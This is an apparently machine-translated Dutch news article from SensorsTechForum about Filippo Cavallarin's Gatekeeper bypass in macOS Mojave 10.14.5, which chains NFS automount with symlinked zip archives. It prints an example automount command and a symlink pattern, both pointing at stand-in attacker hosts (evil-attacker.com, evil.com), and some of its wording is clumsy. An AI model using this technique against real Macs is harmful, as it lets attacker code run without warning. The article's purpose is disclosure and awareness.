Een ongepatchte kwetsbaarheid in MacOS 10.14.5 ook wel bekend als Mojave onlangs werd ontdekt. De fout kan een aanvaller willekeurige code uitvoeren zonder gebruikersinteractie, daardoor omzeilen Gatekeeper.
Deze ontdekking komt van onderzoeker Filippo Cavallarin van Segment, een in Italië gevestigde cyberveiligheid bedrijf. "Op MacOS X versie <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,”De onderzoeker schreef.
Hoe is de Gatekeeper bypass mogelijk?
Eerste, dient te worden opgemerkt dat het in het ontwerp Gatekeeper om zowel externe schijven en gedeelde netwerken als veilig te accepteren, waardoor apps die ze bevatten vlekkeloos draaien. Echter, door het samenstellen van twee legitieme kenmerken van MacOS, is het mogelijk om de Poortwachter en de misleiden “voorgenomen gedrag".
Dus, wat zijn deze functies? De eerste kan een gebruiker op een netwerk share automatisch te monteren door simpelweg een pad begint met het aanvaarden van “/ net /”:
Bijvoorbeeld
ls /net/evil-attacker.com/sharedfolder/
zal de os lees de inhoud van de ‘sharedfolder’ op de externe host (evil-attacker.com) het gebruik van NFS.
De andere functie is over zip-archieven met symbolische links die verwijzen naar willekeurige locaties. Bovendien, de software die zip-bestanden decompresseert MacOS geen controles uitvoeren op de symlinks voorafgaand aan het creëren van hen, de onderzoeker uitgelegd.
Hoe zou een aanval werk? Een aanvaller kan een zip-bestand met een symbolische link ambachtelijke een automount-hacker gecontroleerde eindpunt (ex Documenten -> /net/evil.com/Documents) en kon sturen naar een gerichte systeem. De gebruiker zou het downloaden van de kwaadaardige archief, en zou het kwaadaardige bestand uit te pakken zonder dat er iets te vermoeden.
Nu is het slachtoffer in een locatie gecontroleerd door de aanvaller, maar vertrouwd door Gatekeeper, dus elke aanvaller gecontroleerde uitvoerbaar kunnen worden uitgevoerd zonder enige waarschuwing. De manier waarop Finder is ontworpen (ex hide .app extensies, verbergen volledige pad van titelbalk) maakt dit tecnique zeer effectief en moeilijk te herkennen, de onderzoeker genoteerd.
Er is ook een videodemonstratie van hoe dit Gatekeeper bypass werkt.
Dit is niet het eerste geval van MacOS ingebouwde bescherming a.k.a. Gatekeeper wordt omzeild. In februari van dit jaar, Trend Micro security onderzoekers ontdekten dat een kwaadaardig Windows .exe-bestand Mac-computers kunnen infecteren, en kon downloaden infostealer malware vergezeld van adware op hun systemen.
In dat geval, de exe-bestanden in staat waren om de bescherming van Gatekeeper te omzeilen, omdat ze niet werden gecontroleerd door de software, ontworpen om enige inheemse Mac bestanden te controleren. Dit kan leiden tot het omzeilen van de code handtekening controle en verificatie.
Milena Dimitrova
Een bevlogen schrijver en contentmanager die sinds de start van het project bij SensorsTechForum werkt. Een professional met 10+ jarenlange ervaring in het creëren van boeiende inhoud. Gericht op de privacy van gebruikers en malware ontwikkeling, ze gelooft sterk in een wereld waar cybersecurity speelt een centrale rol. Als het gezond verstand heeft geen zin, ze zullen er zijn om aantekeningen te maken. Deze toelichtingen kunnen later om te zetten in artikelen! Volg Milena @Milenyim
Volg mij: